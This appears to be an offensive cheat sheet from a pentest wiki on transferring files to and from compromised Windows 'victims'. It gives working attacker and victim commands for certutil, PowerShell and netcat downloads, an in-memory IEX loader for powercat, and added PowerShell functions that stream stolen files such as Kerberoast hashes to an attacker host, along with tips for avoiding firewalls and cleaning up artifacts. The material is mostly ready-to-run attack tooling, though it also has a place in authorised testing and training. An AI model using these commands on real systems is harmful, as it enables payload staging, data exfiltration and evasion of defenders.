Zero Day Archives

Windows

Uploading Files to Victims in Windows

1. PowerShell Download File

PowerShell provides a built-in method for downloading files directly from a remote web server.

Attacking Machine Command:

python3 -m http.server 8080

Victim Machine Command:

powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.10.10.1:8080/FileToTransfer','C:\Users\test\Desktop\FileToTransfer')"

Explanation: The attacking machine sets up a simple HTTP server using Python, and the victim machine downloads the file using PowerShell’s WebClient object.

2. Certutil

Certutil is a signed, built-in Windows certificate-management utility whose URL cache option can fetch arbitrary files over HTTP, which makes it a common living-off-the-land download method on hosts where PowerShell is restricted. It is also one of the most heavily signatured download techniques, so expect AV/EDR to flag or block it.

Attacking Machine Command:

python3 -m http.server 8080

Victim Machine Command:

certutil.exe -urlcache -split -f http://10.10.10.1:8080/FileToTransfer FileToTransfer

Explanation: The attacker runs a Python HTTP server, and the victim machine uses certutil to fetch the URL (-f forces a fresh download, -split writes the response body to the named file). Certutil also keeps a copy of the download in the user's URL cache; remove that artifact afterwards with certutil.exe -urlcache http://10.10.10.1:8080/FileToTransfer delete.

3. PowerShell IWR (Invoke-WebRequest)

Invoke-WebRequest (aliased iwr) downloads files in PowerShell 3.0 and later, similar to wget in Linux.

Attacking Machine Command:

python3 -m http.server 80

Victim Machine Command:

iwr -Uri http://10.10.10.1/FileToTransfer -OutFile FileToTransfer -UseBasicParsing

Explanation: The attacker sets up an HTTP server on port 80, and the victim uses PowerShell's iwr command to download and save the file locally. -UseBasicParsing skips the Internet Explorer DOM parser, which otherwise fails on Server Core and on accounts where IE first-run setup has never completed (Windows PowerShell 5.1 and earlier; PowerShell 7 accepts the switch and ignores it). On Windows PowerShell the progress bar also slows large downloads noticeably; set $ProgressPreference = 'SilentlyContinue' first.
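The three HTTP methods above download a file but never check that what landed on disk is what was served. The following is an added example (not code from the original page or from the Zero Day Archives project) that wraps the PowerShell methods into one helper: it uses Invoke-WebRequest where available, falls back to WebClient on PowerShell 2.0, and verifies a SHA-256 hash before the file is used. The attacker address 10.10.10.1:8080 and the file name come from this page; the function name and the expected-hash value are assumptions.

```powershell
# Added example, not code from the original page: an HTTP download helper that
# uses Invoke-WebRequest where it exists, falls back to WebClient on PowerShell
# 2.0, and verifies a SHA-256 hash before the file is trusted or executed.
# Assumptions: attacker HTTP server at http://10.10.10.1:8080 (as on this page);
# the expected hash is produced on the attacking machine with `sha256sum`.

function Get-RemoteFile {
    param(
        [Parameter(Mandatory=$true)] [string] $Url,
        [Parameter(Mandatory=$true)] [string] $OutFile,
        [string] $ExpectedSha256 = ''    # empty string skips verification
    )

    # Hide the progress bar: on Windows PowerShell it slows large downloads badly.
    $ProgressPreference = 'SilentlyContinue'

    if ($PSVersionTable.PSVersion.Major -ge 3) {
        # -UseBasicParsing avoids the Internet Explorer DOM parser, which is
        # missing on Server Core and breaks when IE first-run setup never ran.
        Invoke-WebRequest -Uri $Url -OutFile $OutFile -UseBasicParsing
    } else {
        # PowerShell 2.0 has no Invoke-WebRequest; WebClient is always present.
        (New-Object System.Net.WebClient).DownloadFile($Url, $OutFile)
    }

    if ($ExpectedSha256 -ne '') {
        # Hash via .NET rather than Get-FileHash so this also works on PS 2.0/3.0,
        # and stream the file so a large payload is not read into memory at once.
        $sha    = [System.Security.Cryptography.SHA256]::Create()
        $stream = [System.IO.File]::OpenRead($OutFile)
        try     { $digest = $sha.ComputeHash($stream) }
        finally { $stream.Close() }
        $actual = ([System.BitConverter]::ToString($digest)) -replace '-', ''

        if ($actual -ne $ExpectedSha256.ToUpper()) {
            Remove-Item -Path $OutFile -Force    # never leave a tampered file behind
            throw "SHA-256 mismatch for ${OutFile}: got $actual, expected $ExpectedSha256"
        }
    }
    Get-Item -Path $OutFile
}

# Usage: the hash is a placeholder, replace it with the output of
# `sha256sum FileToTransfer` on the attacking machine.
Get-RemoteFile -Url 'http://10.10.10.1:8080/FileToTransfer' `
               -OutFile 'C:\Users\test\Desktop\FileToTransfer' `
               -ExpectedSha256 '<sha256 from attacker>'
```

The hash check matters most when the transfer crosses a pivot or a flaky link: a truncated executable still runs, and a truncated archive still extracts partially, so a size or hash comparison is the only cheap way to notice. The function deletes the file on mismatch so a later step cannot pick it up by accident.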

4. Netcat

Netcat can push a file to a victim machine over a raw TCP connection. This requires nc.exe to already be present on the victim (use one of the HTTP methods above to get it there first) and the victim's host firewall to allow an inbound connection on the chosen port.

Victim Machine Command:

nc.exe -lvp 4444 > FileToTransfer

Attacking Machine Command:

nc 10.10.10.2 4444 -w 3 < FileToTransfer

Explanation: The victim machine listens on port 4444 and redirects whatever arrives into FileToTransfer; the attacker connects and pipes the file in. -w 3 makes the attacker's nc exit after three seconds of idle time once the file has been sent, which closes the connection and lets the victim's listener exit. Netcat does no integrity checking, so compare a hash (sha256sum on the attacker, Get-FileHash on the victim) after the transfer.

5. FTP

FTP can be used to transfer files between systems. Here's how to do it with the Twisted FTP server, which listens on port 2121 and allows anonymous logins by default.

Attacking Machine Command:

twistd -n ftp -r .

Victim Machine Command:

ftp
open 10.10.10.1 2121
anonymous
binary
get FileToTransfer
bye

Explanation: The attacker runs an FTP server with twistd, serving the current directory (-r .). The victim connects with the built-in Windows ftp client, logs in as anonymous (any value works at the password prompt), switches to binary mode so that executables and archives are not mangled by the default ASCII transfer, and downloads the file. The Windows ftp client only supports active mode, so the attacker's server must be able to open the data connection back to the victim; if the victim's host firewall blocks inbound connections the login succeeds but the transfer fails, and one of the HTTP or SMB methods is the better choice.

6. SMB

SMB is the native file-sharing protocol in Windows environments, so copying from an attacker-hosted share needs nothing beyond the built-in copy command.

Attacking Machine Command:

impacket-smbserver -smb2support test .

Victim Machine Command:

copy \\10.10.10.1\test\FileToTransfer FileToTransfer

Explanation: The attacker sets up an SMB server with impacket-smbserver, exposing the current directory as a share named test (-smb2support is needed because current Windows versions no longer speak SMB1). The victim copies the file from the share by its UNC path \\server\share\file; SMB always uses TCP 445, so no port appears in the path. Recent Windows builds block unauthenticated guest access to shares by default, in which case start the server with -username and -password and authenticate first with net use \\10.10.10.1\test <password> /user:<username>.


Downloading Files from Victims in Windows

1. Netcat

Netcat can be used to receive files from a victim machine by listening on a port.

Attacking Machine Command:

nc -lvp 4444 > hashes.kerberoast

Victim Machine Command:

nc.exe 10.10.10.1 4444 -w 3 < hashes.kerberoast

Explanation: The attacker listens on port 4444 for incoming data and receives it from the victim using nc.
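The Netcat method only works if nc.exe is already on the victim. The following is an added example (not code from the original page or from the Zero Day Archives project) that sends a file to the same attacker-side listener, nc -lvp 4444 > hashes.kerberoast, using the .NET TcpClient class that every Windows host already has, so nothing needs to be dropped to disk first. The attacker address 10.10.10.1:4444 and the file name come from this page; the function name and the local path are assumptions.

```powershell
# Added example, not code from the original page: stream a file from the victim
# to the attacker's netcat listener with .NET sockets, so nc.exe is not needed
# on the victim. Pair it with `nc -lvp 4444 > hashes.kerberoast` on the
# attacking machine (10.10.10.1, as on this page).

function Send-FileOverTcp {
    param(
        [Parameter(Mandatory=$true)] [string] $Path,
        [Parameter(Mandatory=$true)] [string] $RemoteHost,
        [Parameter(Mandatory=$true)] [int]    $Port
    )
    $client = New-Object System.Net.Sockets.TcpClient
    try {
        $client.Connect($RemoteHost, $Port)
        $net  = $client.GetStream()
        $file = [System.IO.File]::OpenRead($Path)
        try {
            # Stream in 64 KiB chunks rather than reading the whole file into
            # memory, so large artefacts (memory dumps, archives) work as well.
            $buf  = New-Object byte[] 65536
            $sent = 0
            while (($n = $file.Read($buf, 0, $buf.Length)) -gt 0) {
                $net.Write($buf, 0, $n)
                $sent += $n
            }
            $net.Flush()
        } finally {
            $file.Close()
        }
        # Half-close the socket: the listener sees EOF and knows the transfer is
        # complete instead of waiting for an idle timeout (the reason the page's
        # nc.exe command uses -w 3).
        $client.Client.Shutdown([System.Net.Sockets.SocketShutdown]::Send)
        return $sent    # bytes written; compare with the file size on the attacker
    } finally {
        $client.Close()
    }
}

Send-FileOverTcp -Path 'C:\Users\test\hashes.kerberoast' -RemoteHost '10.10.10.1' -Port 4444
```

Because the victim connects outbound, this also sidesteps the inbound host-firewall problem that the listen-on-victim variants have. The returned byte count should equal the size of hashes.kerberoast on the attacking machine; a mismatch means the connection was cut before the listener received everything.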

2. FTP

FTP can also be used to upload files from the victim machine to the attacker's machine, using the pyftpdlib server in writable mode.

Attacking Machine Command:

python -m pyftpdlib -w

Victim Machine Command:

ftp
open 10.10.10.1 2121
anonymous
binary
put FileToDownload
bye

Explanation: The attacker runs pyftpdlib, which serves the current directory on port 2121 with anonymous access; -w grants the anonymous user write permission, without which the put fails. The victim logs in, switches to binary mode, and uploads the file. The same active-mode caveat as above applies: the attacker's server must be able to connect back to the victim for the data channel.
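Typing the ftp commands interactively, as in both FTP sections on this page, is unreliable from a reverse shell where prompts often do not render. The following is an added example (not code from the original page or from the Zero Day Archives project) that drives the built-in Windows ftp client non-interactively with a script file and covers both directions: get from the twistd or pyftpdlib server on 10.10.10.1:2121, and put back to pyftpdlib started with -w. The server address, port and file names come from this page; the function name, the script location and the anonymous password are assumptions.

```powershell
# Added example, not code from the original page: run ftp.exe non-interactively
# with a script file (-s:) for both directions used on this page.
# Assumptions: FTP server on 10.10.10.1:2121 with anonymous access (twistd or
# pyftpdlib, as on this page); the script is written to $env:TEMP.

function Invoke-FtpTransfer {
    param(
        [Parameter(Mandatory=$true)] [ValidateSet('get','put')] [string] $Direction,
        [Parameter(Mandatory=$true)] [string] $File,
        [string] $Server = '10.10.10.1',
        [int]    $Port   = 2121,
        [string] $User   = 'anonymous',
        [string] $Pass   = 'anonymous@'
    )
    $script = Join-Path $env:TEMP 'ftp.txt'

    # -n suppresses auto-login so `user` can supply the credentials explicitly.
    # `binary` is essential: the default ASCII mode rewrites line endings and
    # corrupts executables and archives.
    @(
        "open $Server $Port",
        "user $User $Pass",
        "binary",
        "$Direction $File",
        "bye"
    ) | Set-Content -Path $script -Encoding ASCII

    try {
        ftp -v -n "-s:$script"
    } finally {
        # Do not leave the script (and any real credentials) on disk.
        Remove-Item -Path $script -Force -ErrorAction SilentlyContinue
    }
}

# Download to the victim (matches the `get FileToTransfer` section above)
Invoke-FtpTransfer -Direction get -File FileToTransfer
# Upload from the victim (matches the `put FileToDownload` section above)
Invoke-FtpTransfer -Direction put -File FileToDownload
```

The active-mode limitation of ftp.exe still applies here: the attacker's server opens the data connection back to the victim, so a host firewall that blocks inbound connections makes the transfer fail even though the login succeeds. Check the directory listing on the attacking machine after a put rather than trusting the client's output.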

3. SMB

SMB is also useful for downloading files from the victim machine back to the attacker's system: the victim writes into the attacker-hosted share.

Attacking Machine Command:

impacket-smbserver -smb2support test .

Victim Machine Command:

copy FiletoDownload \\10.10.10.1\test\FiletoDownload

Explanation: The attacker sets up the same SMB server as before, and the victim copies the file into the share; it lands in the directory impacket-smbserver was started from. If guest access is blocked, start the server with -username and -password and authenticate with net use first, as described above.
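Both SMB sections on this page rely on unauthenticated guest access, which Windows 10 1709+ and Server 2019+ refuse by default. The following is an added example (not code from the original page or from the Zero Day Archives project) that maps the impacket share with credentials, copies in either direction with a size check, and removes the mapping afterwards. The server address 10.10.10.1 and share name test come from this page; the credentials user/pass, the function name and the local paths are assumptions, and the server must be started with matching -username and -password options.

```powershell
# Added example, not code from the original page: authenticated SMB copy in
# both directions. Start the server as
#   impacket-smbserver -smb2support -username user -password pass test .
# Assumptions: share \\10.10.10.1\test (host and share name as on this page),
# credentials user/pass, and local paths under C:\Users\test.

function Copy-ViaSmb {
    param(
        [Parameter(Mandatory=$true)] [string] $Source,
        [Parameter(Mandatory=$true)] [string] $Destination,
        [string] $Share = '\\10.10.10.1\test',
        [string] $User  = 'user',
        [string] $Pass  = 'pass'
    )
    # Authenticate to the share once; Windows caches the session for all
    # subsequent UNC access to that server.
    net use $Share $Pass /user:$User | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "net use failed for $Share" }
    try {
        Copy-Item -Path $Source -Destination $Destination -Force
        # Size check: a truncated copy over a flaky pivot is easy to miss.
        $src = Get-Item -Path $Source
        $dst = Get-Item -Path $Destination
        if ($src.Length -ne $dst.Length) {
            throw "size mismatch: source $($src.Length) bytes, destination $($dst.Length) bytes"
        }
        $dst
    } finally {
        # Drop the mapping so the session (and the credentials) do not linger.
        net use $Share /delete /y | Out-Null
    }
}

# Upload to the victim: share -> local disk
Copy-ViaSmb -Source '\\10.10.10.1\test\FileToTransfer' -Destination 'C:\Users\test\FileToTransfer'
# Download from the victim: local disk -> share
Copy-ViaSmb -Source 'C:\Users\test\FiletoDownload' -Destination '\\10.10.10.1\test\FiletoDownload'
```

Copy-Item handles both directions because the UNC path is a normal path once the session exists; the same function therefore replaces both copy commands on this page. Removing the mapping at the end also clears the stored session, which matters on a shared host where another user could otherwise reuse it.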

4. PowerCat

PowerCat is a PowerShell implementation of Netcat. It can send a file in the same way as Netcat, without nc.exe ever touching the victim's disk: the script is loaded straight into memory from the attacker's web server.

Attacking Machine Commands:

python3 -m http.server 80
nc -lvp 4444 > FiletoDownload

Victim Machine Command:

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.10.1/powercat.ps1');powercat -c 10.10.10.1 -p 4444 -i C:\Users\test\FiletoDownload"

Explanation: The attacker serves powercat.ps1 over HTTP and listens on port 4444 with nc. The victim downloads the script into memory with IEX, then uses powercat -c to connect out to the attacker on port 4444 and stream the file given with -i. Connecting outbound (rather than listening with -l) avoids the victim's inbound firewall rules and matches the direction of the Netcat example above.



Last updated 2 months ago